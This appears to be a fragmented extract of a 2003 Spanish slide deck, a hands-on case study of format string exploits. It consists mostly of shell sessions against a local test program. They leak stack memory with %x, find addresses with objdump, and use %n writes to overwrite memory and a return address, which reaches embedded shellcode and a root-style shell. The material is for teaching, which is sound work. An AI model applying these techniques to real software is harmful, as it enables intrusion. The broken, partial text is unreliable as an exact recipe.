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784C-6D46-48F9-AE10-B1F9D49D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0FE-8147-4819-AFDF-C0930D39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E037-48C3-4C0D-B119-6986D7929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8D2-834A-4693-A953-55750077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750-6542-43CB-94F2-0D6E737A6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08EF-E12F-403D-A0C1-53C5A2950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784F-2F62-4D8E-BFDA-8DC3C775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DF4-65CF-4B18-BCFD-066D8A351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9951-D062-4641-B104-A945B673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590-40F2-42B0-8295-1F53BCFE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CCB2-3834-41E7-AE4A-1782E067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4772-7987-4530-A1E3-168F9803F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9887B-DCB1-4507-9E64-6F1BB9933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t string exploits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aso prac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milio Mi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grama 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955800"/>
          <a:ext cx="8610480" cy="574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55800"/>
                    <a:ext cx="8610480" cy="574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tenido de la pi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emilio@vega fstring]$ ./fs1 $(perl -e 'print "%x."x40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808f121.bffff6d8.804864c.0.20415.bffff7c8.804828a.bffff6f0.0.79.80a41c0.80a41c0.c.79.78.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e782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emilio@vega fstring]$ ./fs1 AAAA%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%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AAAA808f121.bffff728.804864c.0.20415.bffff818.804828a.bffff740.0.34.80a41c0.80a41c0.c.34.33.414141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ificar memoria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emilio@vega fstring]$ objdump -D fs1 | grep '&lt;num&gt;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80a3074 &lt;num&gt;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emilio@vega fstring]$ ./fs1 AAAA$'\x74\x30\x0a\x08'%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x.%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AAAAt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08f121bffff728804864c020415bffff818804828abffff74002c80a41c080a41c0c2c2b41414141.80a30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emilio@vega fstring]$ ./fs1 AAAA$'\x74\x30\x0a\x08'%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%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AAAAt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08f121bffff728804864c020415bffff818804828abffff74002b80a41c080a41c0c2b2a414141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: 5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odificar memoria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 ./fs1 AAAA$'\x74\x30\x0a\x08'AAAA$'\x74\x30\x0a\x08'AAAA$'\x74\x30\x0a\x08'AAAA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'\x74\x30\x0a\x08'%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%u%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AAAA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A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A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A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08f121bffff718804864c020415bffff808804828abffff73004380a41c080a41c0c434210947955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7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 ./findaddr -115 0x123456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dress: 0x123456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tes written so far: 0x68/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length: 0x234/5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ad1: 0xf/15    Pad2: 0xde/222  Pad3: 0xde/222  Pad4: 0xde/2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milio@vega fstring]$ ./fs1 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$'\x74\x30\x0a\x08'AAAA$'\x75\x30\x0a\x08'AAAA$'\x76\x30\x0a\x08'AAAA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'\x77\x30\x0a\x08'%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%15u%n%222u%n%222u%n%222u%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AAAAt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Au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Av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AAAw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08f121bffff6f8804864c020415bffff7e8804828abffff71005a80a41c080a41c0c5a59     1094795585       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    10947955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123456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t string explo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960" y="609480"/>
            <a:ext cx="876276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 objdump -D fs1 | grep shell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80a3040 &lt;shellcode&gt;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0a3040:       eb 24                   jmp    80a3066 &lt;shellcode+0x26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80a3066:       e8 d7 ff ff ff          call   80a3042 &lt;shellcode+0x2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 ./findaddr -115 0x080a30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ddress: 0x80a304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ytes written so far: 0x68/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length: 0x30a/77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ad1: 0xd7/215  Pad2: 0xf0/240  Pad3: 0xda/218  Pad4: 0xfe/25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 ./fs1 AAAA$'\xfc\xf6\xff\xbf'AAAA$'\xfd\xf6\xff\xbf'AAAA$'\xfe\xf6\xff\xbf'AAAA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'\xff\xf6\xff\xbf'%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%215u%n%240u%n%218u%n%254u%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AAAAï¿½ï¿½ï¿½ï¿½AAAAï¿½ï¿½ï¿½ï¿½AAAAï¿½ï¿½ï¿½ï¿½AAAAï¿½ï¿½ï¿½ï¿½808f121bffff6f8804864c020415bffff7e8804828abffff71005b80a41c080a41c0c5b5a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                                    10947955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[emilio@vega fstring]$ ./fs1 AAAA$'\xec\xf7\xff\xbf'AAAA$'\xed\xf7\xff\xbf'AAAA$'\xee\xf7\xff\xbf'AAAA</a:t>
            </a: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$'\xef\xf7\xff\xbf'%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%215u%n%240u%n%218u%n%254u%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AAAAï¿½ï¿½ï¿½ï¿½AAAAï¿½ï¿½ï¿½ï¿½AAAAï¿½ï¿½ï¿½ï¿½AAAAï¿½ï¿½ï¿½ï¿½808f121bffff6f8804864c020415bffff7e8804828abffff71005b80a41c080a41c0c5b5a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1094795585                                                                                                                                                                                                                                                    10947955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ner fun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um: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h-2.05b$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31T11:38:50Z</dcterms:created>
  <dc:creator>Emilio Mira Alfaro</dc:creator>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy>santi</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2003-07-31T13:02:14Z</dcterms:modified>
  <cp:revision>2</cp:revision>
  <dc:subject/>
  <dc:title>Format string exploits Caso practico</dc:title>
</cp:coreProperties>
</file>